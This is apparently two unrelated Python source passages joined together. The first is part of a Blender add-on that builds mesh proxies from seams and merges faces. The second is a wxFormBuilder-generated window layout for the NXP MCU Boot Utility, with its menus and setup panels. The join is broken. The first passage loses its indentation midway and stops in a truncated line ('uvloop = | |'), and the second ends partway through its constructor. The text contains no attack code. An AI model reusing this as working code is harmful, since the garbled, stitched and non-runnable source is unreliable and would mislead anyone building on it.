    print("PxyHumVerts", len(pxyHumVerts), len(humPxyVerts))
    # Next free vertex/edge indices on the proxy.
    pvn = len(pxy.data.vertices)
    pen = len(pxy.data.edges)
    newHumPxyVerts = {}   # human vertex index -> newly allocated proxy index
    newPxyEdges = []      # (edge index, proxy v1, proxy v2) to create
    for e in hum.data.edges:
        if e.use_seam:
            hvn1,hvn2 = e.vertices
            pvn1 = humPxyVerts[hvn1]
            pvn2 = humPxyVerts[hvn2]
            useAdd = False  # NOTE(review): assigned but never used
            if pvn1 is None or pvn2 is None:
                # At least one endpoint is missing on the proxy: allocate
                # proxy vertices for both endpoints (reusing any allocated
                # earlier in this loop) and queue a new seam edge.
                if hvn1 in newHumPxyVerts.keys():
                    pvn1 = newHumPxyVerts[hvn1]
                else:
                    pvn1 = newHumPxyVerts[hvn1] = pvn
                    pvn += 1
                if hvn2 in newHumPxyVerts.keys():
                    pvn2 = newHumPxyVerts[hvn2]
                else:
                    pvn2 = newHumPxyVerts[hvn2] = pvn
                    pvn += 1
                newPxyEdges.append((pen, pvn1, pvn2))
                pen += 1
    newVerts = [(pvn,hvn) for hvn,pvn in newHumPxyVerts.items()]
    newVerts.sort()
    # Clear existing seams/selection on the proxy before adding geometry.
    setActiveObject(context, pxy)
    bpy.ops.object.mode_set(mode='EDIT')
    bpy.ops.mesh.select_mode(type='EDGE')
    bpy.ops.mesh.select_all(action='SELECT')
    bpy.ops.mesh.mark_seam(clear=True)
    bpy.ops.mesh.select_all(action='DESELECT')
    bpy.ops.object.mode_set(mode='OBJECT')
    print("BEF", len(pxy.data.vertices), len(pxy.data.edges))
    pxy.data.vertices.add(len(newVerts))
    for pvn,hvn in newVerts:
        pv = pxy.data.vertices[pvn]
        pv.co = hum.data.vertices[hvn].co.copy()
        #print(pv.index,pv.co)
    pxy.data.edges.add(len(newPxyEdges))
    for pen,pvn1,pvn2 in newPxyEdges:
        pe = pxy.data.edges[pen]
        pe.vertices = (pvn1,pvn2)
        pe.select = True
        #print(pe.index, list(pe.vertices), pe.use_seam)
    print("AFT", len(pxy.data.vertices), len(pxy.data.edges))
    return
    # ---- unreachable from here on (kept from an earlier experiment) ----
    pxyHumFaces = {}
    for pfn,pfverts in enumerate(pxyFaceVerts):
        cands = []
        for pvn in pfverts:
            hvn = pxyHumVerts[pvn]
            for hfn in humVertFaces[hvn]:
                cands.append(hfn)
        print(pfn, cands)
        if len(cands) == 16:
            vcount = {}
            for hfn in cands:
                for hvn in humFaceVerts[hfn]:
                    if hvn not in vcount.keys():
                        vcount[hvn] = []
                    vcount[hvn].append(hfn)
            vlist = [(len(hfns),hvn,hfns) for hvn,hfns in vcount.items()]
            vlist.sort()
            print(vlist)
            pxyHumFaces[pfn] = vlist[-1]
            print("RES", pfn, pxyHumFaces[pfn])
            for hfn in vlist[-1][2]:
                hf = hum.data.polygons[hfn]
                hf.select = True
class DAZ_OT_FindPolys(bpy.types.Operator):
    # Blender operator wrapper around findPolys().
    bl_idname = "daz.find_polys"
    bl_label = "Find Polys"
    bl_options = {'UNDO'}
    @classmethod
    def poll(self, context):
        # Enabled whenever there is an active object.  (NOTE: first
        # parameter of a classmethod is really the class, conventionally
        # named `cls`.)
        return context.object
    def execute(self, context):
        checkObjectMode(context)
        try:
            findPolys(context)
        except DazError:
            # Errors are reported to the user; the operator still returns
            # FINISHED either way.
            handleDazError(context)
        return {'FINISHED'}
#-------------------------------------------------------------
# Make faithful proxy
#-------------------------------------------------------------
class Proxifier:
def __init__(self, ob):
    """Capture the mesh object and initialize bookkeeping; topology
    tables are filled in later by setup()."""
    self.object = ob
    self.nfaces = len(ob.data.polygons)
    self.nverts = len(ob.data.vertices)
    # Topology tables, populated by setup() via findSeams():
    self.faceverts = None  # face index -> vertex indices of that face
    self.vertfaces = None  # vertex index -> faces using that vertex
    self.neighbors = None  # face index -> adjacent face indices
    self.seams = None      # face index -> neighbors across a seam
    self.faces = []
    self.matOffset = 10    # NOTE(review): purpose not visible in this chunk
    self.origMnums = {}    # face index -> original material index
    self.colorOnly = False # True: only recolor faces instead of rebuilding
def remains(self):
    """Count the faces not yet consumed (dirty flag still False)."""
    return sum(1 for taken in self.dirty.values() if not taken)
def setup(self, ob, context):
    """Build topology tables, record material indices, and mark hidden
    faces as already consumed.  Returns the initial newfaces list (one
    single-face group per hidden face)."""
    self.faceverts, self.vertfaces, self.neighbors, self.seams = findSeams(ob)
    if self.colorOnly:
        self.createMaterials()
    self.origMnums = {}
    for f in ob.data.polygons:
        self.origMnums[f.index] = f.material_index
        if self.colorOnly:
            # Reset all faces to material 0; original indices are kept in
            # origMnums for later recoloring.
            f.material_index = 0
    deselectEverything(ob, context)
    # dirty[fn] == True means face fn has been consumed/excluded.
    self.dirty = dict([(fn,False) for fn in range(self.nfaces)])
    for f in ob.data.polygons:
        if f.hide:
            self.dirty[f.index] = True
    # Hidden faces pass through unchanged as single-face groups.
    newfaces = [[fn] for fn in range(self.nfaces) if self.dirty[fn]]
    printStatistics(ob)
    return newfaces
def getConnectedComponents(self):
    """Group faces into connected components with a union-find pass.

    Returns (comps, taken): comps maps canonical cluster id -> list of
    face indices (possibly empty for ids merged away); taken maps each
    cluster id -> False, for callers to mark as they consume clusters.
    Also canonicalizes self.clusters in a second pass.
    """
    # clusters[fn]: cluster id of face fn (-1 = unassigned yet).
    self.clusters = dict([(fn,-1) for fn in range(self.nfaces)])
    # refs: union-find parent pointers over cluster ids.
    self.refs = dict([(fn,fn) for fn in range(self.nfaces)])
    cnum = 0
    for fn in range(self.nfaces):
        cnums = []
        for fn2 in self.neighbors[fn]:
            cn = self.clusters[fn2]
            if cn >= 0:
                cnums.append(self.deref(cn))
        cnums.sort()
        if cnums:
            # Adopt the smallest neighboring cluster; redirect the rest
            # onto it (union step).
            self.clusters[fn] = cn0 = cnums[0]
            for cn in cnums[1:]:
                self.refs[cn] = cn0
        else:
            # No classified neighbor yet: open a fresh cluster.
            self.clusters[fn] = cn0 = cnum
            cnum += 1
    comps = dict([(cn,[]) for cn in range(cnum)])
    taken = dict([(cn,False) for cn in range(cnum)])
    for fn in range(self.nfaces):
        cn = self.clusters[fn]
        cn = self.deref(cn)
        comps[cn].append(fn)
        self.clusters[fn] = cn
    return comps,taken
def deref(self, cn):
    """Follow self.refs to the canonical cluster id, compressing the
    path so future lookups are O(1)."""
    visited = []
    while self.refs[cn] != cn:
        visited.append(cn)
        cn = self.refs[cn]
    # Path compression: point every traversed id straight at the root.
    for node in visited:
        self.refs[node] = cn
    return cn
def getNodes(self):
    """Choose seed faces for the merge pass.

    A face becomes a seed when it touches a vertex of irregular valence
    (face count not 0, 2 or 4); each connected component without such a
    face contributes its first face, so no component is left seedless.
    Returns the seeds as a set of face indices.
    """
    nodes = []
    comps,taken = self.getConnectedComponents()
    for vn in range(self.nverts):
        fnums = self.vertfaces[vn]
        if len(fnums) not in [0,2,4]:
            # Irregular vertex: all its live faces become seeds.
            for fn in fnums:
                if not self.dirty[fn]:
                    nodes.append(fn)
                    taken[self.clusters[fn]] = True
    for cn,comp in comps.items():
        if len(comp) > 0 and not taken[cn]:
            nodes.append(comp[0])
    return set(nodes)
def make(self, ob, context):
    """Run the proxy-building pipeline: seed faces, iteratively merge
    neighbors outward from the seeds, then either recolor (colorOnly)
    or rebuild the mesh and weld duplicates.

    NOTE(review): mergeFaces/mergeNextFaces/combineFaces are defined
    outside this chunk — their contracts are inferred from usage here.
    """
    newfaces = self.setup(ob, context)
    remains1 = self.remains()
    print("Step 0 Remains:", remains1)
    nodes = self.getNodes()
    # Mark seeds as consumed first so merging never re-enters them.
    for fn in nodes:
        self.dirty[fn] = True
    for fn in nodes:
        self.mergeFaces(fn, newfaces)
    prevblock = newfaces
    step = 1
    remains2 = self.remains()
    # Keep expanding while progress is made, capped at 50 rounds.
    while remains2 and remains2 < remains1 and step < 50:
        print("Step %d Remains:" % step, self.remains())
        block = []
        for newface in prevblock:
            self.mergeNextFaces(newface, block)
        newfaces += block
        prevblock = block
        step += 1
        remains1 = remains2
        remains2 = self.remains()
    print("Step %d Remains:" % step, self.remains())
    if self.colorOnly:
        self.combineFaces(newfaces)
        return
    else:
        self.buildNewMesh(newfaces)
        deleteMidpoints(ob)
        # Weld coincident vertices left over from the rebuild.
        bpy.ops.object.mode_set(mode='EDIT')
        bpy.ops.mesh.select_all(action='SELECT')
        bpy.ops.mesh.remove_doubles()
        bpy.ops.object.mode_set(mode='OBJECT')
        printStatistics(ob)
def makeQuads(self, ob, context):
    """Pair up adjacent triangles (not separated by a seam) into quads,
    then recolor or rebuild the mesh depending on colorOnly."""
    newfaces = self.setup(ob, context)
    for fn1 in range(self.nfaces):
        if self.dirty[fn1]:
            continue
        if len(self.faceverts[fn1]) == 3:
            # Find the first free triangular neighbor on the same side of
            # any seam and fuse the pair.
            for fn2 in self.neighbors[fn1]:
                if (len(self.faceverts[fn2]) == 3 and
                    not self.dirty[fn2] and
                    fn2 not in self.seams[fn1]):
                    self.dirty[fn1] = True
                    self.dirty[fn2] = True
                    newface = [fn1,fn2]
                    newfaces.append(newface)
                    break
    if self.colorOnly:
        self.combineFaces(newfaces)
        return
    else:
        self.buildNewMesh(newfaces)
    printStatistics(ob)
def buildNewMesh(self, newfaces):
from .geometry import makeNewUvloop
free = [[fn] for fn,t in self.dirty.items() if not t]
newfaces += free
ob = self.object
uvtex,uvloop,uvdata = getUvData(ob)
self.vertmap = dict([(vn,-1) for vn in range(self.nverts)])
self.verts = []
self.lastvert = 0
faces = []
uvfaces = []
mats = list(ob.data.materials)
mnums = []
n = 0
for newface in newfaces:
taken = self.findTaken(newface)
n = 0
fn1 = newface[n]
fverts = self.faceverts[fn1]
idx = 0
vn = fverts[idx]
while self.changeFace(vn, fn1, newface) >= 0:
idx += 1
if idx == len(fverts):
n += 1
if n == len(newface):
for fn in newface:
print(fn, self.faceverts[fn])
raise RuntimeError("BUG")
fn1 = newface[n]
fverts = self.faceverts[fn1]
idx = 0
vn = fverts[idx]
face = [self.getVert(vn)]
uvface = [uvdata[fn1][idx]]
mnums.append(self.origMnums[fn1])
taken[vn] = True
done = False
while not done:
fn2 = self.changeFace(vn, fn1, newface)
if fn2 >= 0:
fn1 = fn2
fverts = self.faceverts[fn2]
idx = getIndex(vn, fverts)
idx = (idx+1)%len(fverts)
vn = fverts[idx]
if taken[vn]:
done = True
else:
face.append(self.getVert(vn))
uvface.append(uvdata[fn1][idx])
taken[vn] = True
if len(face) >= 3:
faces.append(face)
uvfaces.append(uvface)
else:
print("Non-face:", face)
me = bpy.data.meshes.new("New")
me.from_pydata(self.verts, [], faces)
uvloop = | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
###########################################################################
## Python code generated with wxFormBuilder (version Oct 26 2018)
## http://www.wxformbuilder.org/
##
## PLEASE DO *NOT* EDIT THIS FILE!
###########################################################################
import wx
import wx.xrc
###########################################################################
## Class secBootWin
###########################################################################
class secBootWin ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"NXP MCU Boot Utility", pos = wx.DefaultPosition, size = wx.Size( 1122,730 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
self.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_menubar = wx.MenuBar( 0 )
self.m_menu_file = wx.Menu()
self.m_menuItem_exit = wx.MenuItem( self.m_menu_file, wx.ID_ANY, u"Exit", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_file.Append( self.m_menuItem_exit )
self.m_menubar.Append( self.m_menu_file, u"File" )
self.m_menu_edit = wx.Menu()
self.m_menubar.Append( self.m_menu_edit, u"Edit" )
self.m_menu_view = wx.Menu()
self.m_menu_language = wx.Menu()
self.m_menuItem_english = wx.MenuItem( self.m_menu_language, wx.ID_ANY, u"EN - English", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_language.Append( self.m_menuItem_english )
self.m_menuItem_chinese = wx.MenuItem( self.m_menu_language, wx.ID_ANY, u"ZH - 简体中文", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_language.Append( self.m_menuItem_chinese )
self.m_menu_view.AppendSubMenu( self.m_menu_language, u"Language/语言" )
self.m_menubar.Append( self.m_menu_view, u"View" )
self.m_menu_tools = wx.Menu()
self.m_menu_runMode = wx.Menu()
self.m_menuItem_runModeEntry = wx.MenuItem( self.m_menu_runMode, wx.ID_ANY, u"Entry", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_runMode.Append( self.m_menuItem_runModeEntry )
self.m_menuItem_runModeMaster = wx.MenuItem( self.m_menu_runMode, wx.ID_ANY, u"Master", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_runMode.Append( self.m_menuItem_runModeMaster )
self.m_menu_tools.AppendSubMenu( self.m_menu_runMode, u"Run Mode" )
self.m_menu_usbDetection = wx.Menu()
self.m_menuItem_usbDetectionDynamic = wx.MenuItem( self.m_menu_usbDetection, wx.ID_ANY, u"Dynamic", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_usbDetection.Append( self.m_menuItem_usbDetectionDynamic )
self.m_menuItem_usbDetectionStatic = wx.MenuItem( self.m_menu_usbDetection, wx.ID_ANY, u"Static", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_usbDetection.Append( self.m_menuItem_usbDetectionStatic )
self.m_menu_tools.AppendSubMenu( self.m_menu_usbDetection, u"USB Detection" )
self.m_menu_soundEffect = wx.Menu()
self.m_menuItem_soundEffectContra = wx.MenuItem( self.m_menu_soundEffect, wx.ID_ANY, u"Contra", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_soundEffect.Append( self.m_menuItem_soundEffectContra )
self.m_menuItem_soundEffectMario = wx.MenuItem( self.m_menu_soundEffect, wx.ID_ANY, u"Mario", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_soundEffect.Append( self.m_menuItem_soundEffectMario )
self.m_menuItem_soundEffectQuiet = wx.MenuItem( self.m_menu_soundEffect, wx.ID_ANY, u"Quiet", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_soundEffect.Append( self.m_menuItem_soundEffectQuiet )
self.m_menu_tools.AppendSubMenu( self.m_menu_soundEffect, u"Sound Effect" )
self.m_menu_genSbFile = wx.Menu()
self.m_menuItem_genSbFileYes = wx.MenuItem( self.m_menu_genSbFile, wx.ID_ANY, u"Yes", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_genSbFile.Append( self.m_menuItem_genSbFileYes )
self.m_menuItem_genSbFileNo = wx.MenuItem( self.m_menu_genSbFile, wx.ID_ANY, u"No", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_genSbFile.Append( self.m_menuItem_genSbFileNo )
self.m_menu_tools.AppendSubMenu( self.m_menu_genSbFile, u"Generate .sb file" )
self.m_menu_imageReadback = wx.Menu()
self.m_menuItem_imageReadbackAutomatic = wx.MenuItem( self.m_menu_imageReadback, wx.ID_ANY, u"Automatic", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_imageReadback.Append( self.m_menuItem_imageReadbackAutomatic )
self.m_menuItem_imageReadbackManual = wx.MenuItem( self.m_menu_imageReadback, wx.ID_ANY, u"Manual", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_imageReadback.Append( self.m_menuItem_imageReadbackManual )
self.m_menu_tools.AppendSubMenu( self.m_menu_imageReadback, u"Image Readback" )
self.m_menu_flashloaderResident = wx.Menu()
self.m_menuItem_flashloaderResidentDefault = wx.MenuItem( self.m_menu_flashloaderResident, wx.ID_ANY, u"Default", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_flashloaderResident.Append( self.m_menuItem_flashloaderResidentDefault )
self.m_menuItem_flashloaderResidentItcm = wx.MenuItem( self.m_menu_flashloaderResident, wx.ID_ANY, u"ITCM", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_flashloaderResident.Append( self.m_menuItem_flashloaderResidentItcm )
self.m_menuItem_flashloaderResidentDtcm = wx.MenuItem( self.m_menu_flashloaderResident, wx.ID_ANY, u"DTCM", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_flashloaderResident.Append( self.m_menuItem_flashloaderResidentDtcm )
self.m_menuItem_flashloaderResidentOcram = wx.MenuItem( self.m_menu_flashloaderResident, wx.ID_ANY, u"OCRAM", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_flashloaderResident.Append( self.m_menuItem_flashloaderResidentOcram )
self.m_menu_tools.AppendSubMenu( self.m_menu_flashloaderResident, u"Flashloader Resident" )
self.m_menu_efuseGroup = wx.Menu()
self.m_menuItem_efuseGroup0 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"0", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup0 )
self.m_menuItem_efuseGroup1 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"1", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup1 )
self.m_menuItem_efuseGroup2 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"2", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup2 )
self.m_menuItem_efuseGroup3 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"3", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup3 )
self.m_menuItem_efuseGroup4 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"4", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup4 )
self.m_menuItem_efuseGroup5 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"5", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup5 )
self.m_menuItem_efuseGroup6 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"6", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup6 )
self.m_menu_tools.AppendSubMenu( self.m_menu_efuseGroup, u"eFuse Group" )
self.m_menu_flexspiXipRegion = wx.Menu()
self.m_menuItem_flexspiXipRegion0 = wx.MenuItem( self.m_menu_flexspiXipRegion, wx.ID_ANY, u"0", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_flexspiXipRegion.Append( self.m_menuItem_flexspiXipRegion0 )
self.m_menuItem_flexspiXipRegion1 = wx.MenuItem( self.m_menu_flexspiXipRegion, wx.ID_ANY, u"1", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_flexspiXipRegion.Append( self.m_menuItem_flexspiXipRegion1 )
self.m_menu_tools.AppendSubMenu( self.m_menu_flexspiXipRegion, u"FlexSPI XIP Region" )
self.m_menubar.Append( self.m_menu_tools, u"Tools" )
self.m_menu_window = wx.Menu()
self.m_menubar.Append( self.m_menu_window, u"Window" )
self.m_menu_help = wx.Menu()
self.m_menuItem_homePage = wx.MenuItem( self.m_menu_help, wx.ID_ANY, u"Home Page", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_help.Append( self.m_menuItem_homePage )
self.m_menuItem_aboutAuthor = wx.MenuItem( self.m_menu_help, wx.ID_ANY, u"About Author", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_help.Append( self.m_menuItem_aboutAuthor )
self.m_menuItem_contributors = wx.MenuItem( self.m_menu_help, wx.ID_ANY, u"Contributors", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_help.Append( self.m_menuItem_contributors )
self.m_menuItem_specialThanks = wx.MenuItem( self.m_menu_help, wx.ID_ANY, u"Special Thanks", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_help.Append( self.m_menuItem_specialThanks )
self.m_menuItem_revisionHistory = wx.MenuItem( self.m_menu_help, wx.ID_ANY, u"Revision History", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_help.Append( self.m_menuItem_revisionHistory )
self.m_menubar.Append( self.m_menu_help, u"Help" )
self.SetMenuBar( self.m_menubar )
bSizer_win = wx.BoxSizer( wx.VERTICAL )
wSizer_func = wx.WrapSizer( wx.HORIZONTAL, wx.WRAPSIZER_DEFAULT_FLAGS )
bSizer_setup = wx.BoxSizer( wx.VERTICAL )
self.m_notebook_targetSetup = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.Size( -1,-1 ), 0 )
self.m_panel_targetSetup = wx.Panel( self.m_notebook_targetSetup, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
self.m_panel_targetSetup.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
wSizer_targetSetup = wx.WrapSizer( wx.HORIZONTAL, wx.WRAPSIZER_DEFAULT_FLAGS )
self.m_staticText_mcuSeries = wx.StaticText( self.m_panel_targetSetup, wx.ID_ANY, u"MCU Series:", wx.DefaultPosition, wx.Size( 95,-1 ), 0 )
self.m_staticText_mcuSeries.Wrap( -1 )
wSizer_targetSetup.Add( self.m_staticText_mcuSeries, 0, wx.ALL, 5 )
m_choice_mcuSeriesChoices = [ u"i.MXRT", u"LPC", u"Kinetis" ]
self.m_choice_mcuSeries = wx.Choice( self.m_panel_targetSetup, wx.ID_ANY, wx.DefaultPosition, wx.Size( 150,-1 ), m_choice_mcuSeriesChoices, 0 )
self.m_choice_mcuSeries.SetSelection( 0 )
wSizer_targetSetup.Add( self.m_choice_mcuSeries, 0, wx.ALL, 5 )
self.m_staticText_mcuDevice = wx.StaticText( self.m_panel_targetSetup, wx.ID_ANY, u"MCU Device:", wx.DefaultPosition, wx.Size( 95,-1 ), 0 )
self.m_staticText_mcuDevice.Wrap( -1 )
wSizer_targetSetup.Add( self.m_staticText_mcuDevice, 0, wx.ALL, 5 )
m_choice_mcuDeviceChoices = [ u"i.MXRT1015", u"i.MXRT102x", u"i.MXRT105x", u"i.MXRT106x", u"i.MXRT1064 SIP" ]
self.m_choice_mcuDevice = wx.Choice( self.m_panel_targetSetup, wx.ID_ANY, wx.DefaultPosition, wx.Size( 150,-1 ), m_choice_mcuDeviceChoices, 0 )
self.m_choice_mcuDevice.SetSelection( 2 )
wSizer_targetSetup.Add( self.m_choice_mcuDevice, 0, wx.ALL, 5 )
self.m_staticText_bootDevice = wx.StaticText( self.m_panel_targetSetup, wx.ID_ANY, u"Boot Device:", wx.DefaultPosition, wx.Size( 95,-1 ), 0 )
self.m_staticText_bootDevice.Wrap( -1 )
wSizer_targetSetup.Add( self.m_staticText_bootDevice, 0, wx.ALL, 5 )
m_choice_bootDeviceChoices = [ u"FLEXSPI NOR", u"FLEXSPI NAND", u"SEMC NOR", u"SEMC NAND", u"uSDHC SD", u"uSDHC MMC/eMMC", u"LPSPI NOR/EEPROM" ]
self.m_choice_bootDevice = wx.Choice( self.m_panel_targetSetup, wx.ID_ANY, wx.DefaultPosition, wx.Size( 150,-1 ), m_choice_bootDeviceChoices, 0 )
self.m_choice_bootDevice.SetSelection( 0 )
wSizer_targetSetup.Add( self.m_choice_bootDevice, 0, wx.ALL, 5 )
self.m_staticText_null1TargetSetup = wx.StaticText( self.m_panel_targetSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 256,5 ), 0 )
self.m_staticText_null1TargetSetup.Wrap( -1 )
wSizer_targetSetup.Add( self.m_staticText_null1TargetSetup, 0, wx.ALL, 5 )
self.m_staticText_null2TargetSetup = wx.StaticText( self.m_panel_targetSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 20,-1 ), 0 )
self.m_staticText_null2TargetSetup.Wrap( -1 )
wSizer_targetSetup.Add( self.m_staticText_null2TargetSetup, 0, wx.ALL, 5 )
self.m_button_bootDeviceConfiguration = wx.Button( self.m_panel_targetSetup, wx.ID_ANY, u"Boot Device Configuration", wx.DefaultPosition, wx.Size( 200,-1 ), 0 )
wSizer_targetSetup.Add( self.m_button_bootDeviceConfiguration, 0, wx.ALL, 5 )
self.m_staticText_null3TargetSetup = wx.StaticText( self.m_panel_targetSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 20,-1 ), 0 )
self.m_staticText_null3TargetSetup.Wrap( -1 )
wSizer_targetSetup.Add( self.m_staticText_null3TargetSetup, 0, wx.ALL, 5 )
self.m_button_deviceConfigurationData = wx.Button( self.m_panel_targetSetup, wx.ID_ANY, u"Device Configuration Data (DCD)", wx.DefaultPosition, wx.Size( 200,-1 ), 0 )
wSizer_targetSetup.Add( self.m_button_deviceConfigurationData, 0, wx.ALL, 5 )
self.m_panel_targetSetup.SetSizer( wSizer_targetSetup )
self.m_panel_targetSetup.Layout()
wSizer_targetSetup.Fit( self.m_panel_targetSetup )
self.m_notebook_targetSetup.AddPage( self.m_panel_targetSetup, u"Target Setup", False )
bSizer_setup.Add( self.m_notebook_targetSetup, 1, wx.EXPAND |wx.ALL, 5 )
self.m_notebook_portSetup = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_panel_portSetup = wx.Panel( self.m_notebook_portSetup, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
wSizer_portSetup = wx.WrapSizer( wx.HORIZONTAL, wx.WRAPSIZER_DEFAULT_FLAGS )
self.m_staticText_null1PortSetup = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,-1 ), 0 )
self.m_staticText_null1PortSetup.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_null1PortSetup, 0, wx.ALL, 5 )
self.m_radioBtn_uart = wx.RadioButton( self.m_panel_portSetup, wx.ID_ANY, u"UART", wx.DefaultPosition, wx.Size( 60,-1 ), 0 )
wSizer_portSetup.Add( self.m_radioBtn_uart, 0, wx.ALL, 5 )
self.m_radioBtn_usbhid = wx.RadioButton( self.m_panel_portSetup, wx.ID_ANY, u"USB-HID", wx.DefaultPosition, wx.Size( 70,-1 ), 0 )
wSizer_portSetup.Add( self.m_radioBtn_usbhid, 0, wx.ALL, 5 )
self.m_staticText_portVid = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, u"COM Port:", wx.DefaultPosition, wx.Size( 95,-1 ), 0 )
self.m_staticText_portVid.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_portVid, 0, wx.ALL, 5 )
m_choice_portVidChoices = []
self.m_choice_portVid = wx.Choice( self.m_panel_portSetup, wx.ID_ANY, wx.DefaultPosition, wx.Size( 150,-1 ), m_choice_portVidChoices, 0 )
self.m_choice_portVid.SetSelection( 0 )
wSizer_portSetup.Add( self.m_choice_portVid, 0, wx.ALL, 5 )
self.m_staticText_baudPid = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, u"Baudrate:", wx.DefaultPosition, wx.Size( 95,-1 ), 0 )
self.m_staticText_baudPid.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_baudPid, 0, wx.ALL, 5 )
m_choice_baudPidChoices = []
self.m_choice_baudPid = wx.Choice( self.m_panel_portSetup, wx.ID_ANY, wx.DefaultPosition, wx.Size( 150,-1 ), m_choice_baudPidChoices, 0 )
self.m_choice_baudPid.SetSelection( 0 )
wSizer_portSetup.Add( self.m_choice_baudPid, 0, wx.ALL, 5 )
self.m_staticText_null2PortSetup = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 256,5 ), 0 )
self.m_staticText_null2PortSetup.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_null2PortSetup, 0, wx.ALL, 5 )
self.m_staticText_null3PortSetup = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 45,-1 ), 0 )
self.m_staticText_null3PortSetup.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_null3PortSetup, 0, wx.ALL, 5 )
self.m_bitmap_connectLed = wx.StaticBitmap( self.m_panel_portSetup, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.Size( 30,30 ), 0 )
wSizer_portSetup.Add( self.m_bitmap_connectLed, 0, wx.ALL, 5 )
self.m_staticText_null4PortSetup = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 30,-1 ), 0 )
self.m_staticText_null4PortSetup.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_null4PortSetup, 0, wx.ALL, 5 )
self.m_checkBox_oneStepConnect = wx.CheckBox( self.m_panel_portSetup, wx.ID_ANY, u"One Step", wx.DefaultPosition, wx.Size( -1,30 ), 0 )
wSizer_portSetup.Add( self.m_checkBox_oneStepConnect, 0, wx.ALL, 5 )
self.m_staticText_null5PortSetup = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 45,-1 ), 0 )
self.m_staticText_null5PortSetup.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_null5PortSetup, 0, wx.ALL, 5 )
self.m_button_connect = wx.Button( self.m_panel_portSetup, wx.ID_ANY, u"Connect to ROM", wx.DefaultPosition, wx.Size( 150,-1 ), 0 )
wSizer_portSetup.Add( self.m_button_connect, 0, wx.ALL, 5 )
self.m_panel_portSetup.SetSizer( wSizer_portSetup )
self.m_panel_portSetup.Layout()
wSizer_portSetup.Fit( self.m_panel_portSetup )
self.m_notebook_portSetup.AddPage( self.m_panel_portSetup, u"Port Setup", False )
